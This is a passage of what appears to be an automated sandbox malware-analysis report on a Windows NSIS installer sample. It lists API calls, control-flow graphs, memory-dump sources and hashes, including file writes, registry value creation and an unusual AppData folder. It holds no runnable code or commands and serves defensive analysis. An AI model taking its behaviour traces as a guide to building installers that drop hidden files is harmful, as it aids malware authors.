                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\________.exe,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00402E35
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\________.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\________.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                  • API String ID: 2803837635-4087227246
                                                                                                                                                  • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                                  • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                                  • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                                  • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
                                                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
                                                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001CAF
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001F57
                                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 100020BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4227406936-0
                                                                                                                                                  • Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                                                                                                                  • Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
                                                                                                                                                  • Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                                                                                                                  • Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 808 401752-401777 call 402b3a call 4059ac 813 401781-401793 call 405eea call 405935 lstrcatW 808->813 814 401779-40177f call 405eea 808->814 819 401798-401799 call 40617e 813->819 814->819 823 40179e-4017a2 819->823 824 4017a4-4017ae call 40622d 823->824 825 4017d5-4017d8 823->825 832 4017c0-4017d2 824->832 833 4017b0-4017be CompareFileTime 824->833 826 4017e0-4017fc call 405b56 825->826 827 4017da-4017db call 405b31 825->827 835 401870-401899 call 405194 call 403062 826->835 836 4017fe-401801 826->836 827->826 832->825 833->832 848 4018a1-4018ad SetFileTime 835->848 849 40189b-40189f 835->849 837 401852-40185c call 405194 836->837 838 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 836->838 850 401865-40186b 837->850 838->823 870 401847-401848 838->870 852 4018b3-4018be CloseHandle 848->852 849->848 849->852 853 4029d0 850->853 855 4018c4-4018c7 852->855 856 4029c7-4029ca 852->856 857 4029d2-4029d6 853->857 860 4018c9-4018da call 405f0c lstrcatW 855->860 861 4018dc-4018df call 405f0c 855->861 856->853 867 4018e4-402243 call 4056c6 860->867 861->867 867->857 870->850 872 40184a-40184b 870->872 872->837
                                                                                                                                                  APIs
                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende\Sluggardliness,?,?,00000031), ref: 00401793
                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende\Sluggardliness,?,?,00000031), ref: 004017B8
                                                                                                                                                    • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp$C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll$C:\Users\user\AppData\Local\foreslaaende\Sluggardliness$Call
                                                                                                                                                  • API String ID: 1941528284-2623147041
                                                                                                                                                  • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                                  • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                                  • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                                  • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 874 40317d-4031a6 GetTickCount 875 4032e7-4032ef call 402d1a 874->875 876 4031ac-4031d7 call 40330f SetFilePointer 874->876 881 4032f1-4032f6 875->881 882 4031dc-4031ee 876->882 883 4031f0 882->883 884 4031f2-403200 call 4032f9 882->884 883->884 887 403206-403212 884->887 888 4032d9-4032dc 884->888 889 403218-40321e 887->889 888->881 890 403220-403226 889->890 891 403249-403265 call 406390 889->891 890->891 892 403228-403248 call 402d1a 890->892 897 4032e2 891->897 898 403267-40326f 891->898 892->891 899 4032e4-4032e5 897->899 900 403271-403287 WriteFile 898->900 901 4032a3-4032a9 898->901 899->881 903 403289-40328d 900->903 904 4032de-4032e0 900->904 901->897 902 4032ab-4032ad 901->902 902->897 905 4032af-4032c2 902->905 903->904 906 40328f-40329b 903->906 904->899 905->882 907 4032c8-4032d7 SetFilePointer 905->907 906->889 908 4032a1 906->908 907->875 908->905
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                                    • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                                  • WriteFile.KERNELBASE(0040BE78,0040C19F,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                                  • SetFilePointer.KERNELBASE(0021D8CC,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Pointer$CountTickWrite
                                                                                                                                                  • String ID: x>A
                                                                                                                                                  • API String ID: 2146148272-3854404225
                                                                                                                                                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                                  • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                                  • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 909 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 916 4029c7-4029d6 909->916 917 40237d-402385 909->917 918 402387-402394 call 402b3a lstrlenW 917->918 919 402398-40239b 917->919 918->919 922 4023ab-4023ae 919->922 923 40239d-4023aa call 402b1d 919->923 927 4023b0-4023ba call 403062 922->927 928 4023bf-4023d3 RegSetValueExW 922->928 923->922 927->928 929 4023d5 928->929 930 4023d8-4024b2 RegCloseKey 928->930 929->930 930->916 934 402793-40279a 930->934 934->916
                                                                                                                                                  APIs
                                                                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp
                                                                                                                                                  • API String ID: 1356686001-11946093
                                                                                                                                                  • Opcode ID: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
                                                                                                                                                  • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                                  • Opcode Fuzzy Hash: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
                                                                                                                                                  • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 935 4015b9-4015cd call 402b3a call 4059e0 940 401614-401617 935->940 941 4015cf-4015eb call 405962 CreateDirectoryW 935->941 942 401646-402197 call 401423 940->942 943 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 940->943 948 40160a-401612 941->948 949 4015ed-4015f8 GetLastError 941->949 956 4029c7-4029d6 942->956 943->956 959 40163e-401641 943->959 948->940 948->941 952 401607 949->952 953 4015fa-401605 GetFileAttributesW 949->953 952->948 953->948 953->952 959->956
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,75572EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 004059EE
                                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\foreslaaende\Sluggardliness,?,00000000,000000F0), ref: 00401630
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\foreslaaende\Sluggardliness, xrefs: 00401623
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\foreslaaende\Sluggardliness
                                                                                                                                                  • API String ID: 3751793516-3939270230
                                                                                                                                                  • Opcode ID: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
                                                                                                                                                  • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                                  • Opcode Fuzzy Hash: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
                                                                                                                                                  • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 961 10001771-100017ad call 10001b3e 965 100017b3-100017b7 961->965 966 100018be-100018c0 961->966 967 100017c0-100017cd call 100022eb 965->967 968 100017b9-100017bf call 100022a1 965->968 973 100017fd-10001804 967->973 974 100017cf-100017d4 967->974 968->967 975 10001824-10001828 973->975 976 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 973->976 977 100017d6-100017d7 974->977 978 100017ef-100017f2 974->978 979 10001866-1000186c call 1000248d 975->979 980 1000182a-10001864 call 100015cc call 1000248d 975->980 1002 1000186d-10001871 976->1002 983 100017d9-100017da 977->983 984 100017df-100017e0 call 10002868 977->984 978->973 981 100017f4-100017f5 call 10002b23 978->981 979->1002 980->1002 996 100017fa 981->996 985 100017e7-100017ed call 1000260b 983->985 986 100017dc-100017dd 983->986 993 100017e5 984->993 1001 100017fc 985->1001 986->973 986->984 993->996 996->1001 1001->973 1005 10001873-10001881 call 10002450 1002->1005 1006 100018ae-100018b5 1002->1006 1011 10001883-10001886 1005->1011 1012 10001899-100018a0 1005->1012 1006->966 1008 100018b7-100018b8 GlobalFree 1006->1008 1008->966 1011->1012 1013 10001888-10001890 1011->1013 1012->1006 1014 100018a2-100018ad call 10001555 1012->1014 1013->1012 1015 10001892-10001893 FreeLibrary 1013->1015 1014->1006 1015->1012
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                                                                    • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                                                                    • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                                                                    • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                                                                    • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1767494692-3916222277
                                                                                                                                                  • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                                  • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                                                                  • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                                  • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1018 403062-403070 1019 403072-403088 SetFilePointer 1018->1019 1020 40308e-403097 call 40317d 1018->1020 1019->1020 1023 403177-40317a 1020->1023 1024 40309d-4030b0 call 405bd9 1020->1024 1027 403163 1024->1027 1028 4030b6-4030ca call 40317d 1024->1028 1030 403165-403166 1027->1030 1028->1023 1032 4030d0-4030d3 1028->1032 1030->1023 1033 4030d5-4030d8 1032->1033 1034 40313f-403145 1032->1034 1037 403174 1033->1037 1038 4030de 1033->1038 1035 403147 1034->1035 1036 40314a-403161 ReadFile 1034->1036 1035->1036 1036->1027 1039 403168-403171 1036->1039 1037->1023 1040 4030e3-4030ed 1038->1040 1039->1037 1041 4030f4-403106 call 405bd9 1040->1041 1042 4030ef 1040->1042 1041->1027 1045 403108-40311d WriteFile 1041->1045 1042->1041 1046 40313b-40313d 1045->1046 1047 40311f-403122 1045->1047 1046->1030 1047->1046 1048 403124-403137 1047->1048 1048->1040 1049 403139 1048->1049 1049->1037
                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                                  • String ID: x>A
                                                                                                                                                  • API String ID: 539440098-3854404225
                                                                                                                                                  • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                                  • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                                  • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                                  • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1050 405db7-405de9 RegOpenKeyExW 1051 405e2b-405e2e 1050->1051 1052 405deb-405e0a RegQueryValueExW 1050->1052 1053 405e18 1052->1053 1054 405e0c-405e10 1052->1054 1056 405e1b-405e25 RegCloseKey 1053->1056 1055 405e12-405e16 1054->1055 1054->1056 1055->1053 1055->1056 1056->1051
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                                                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
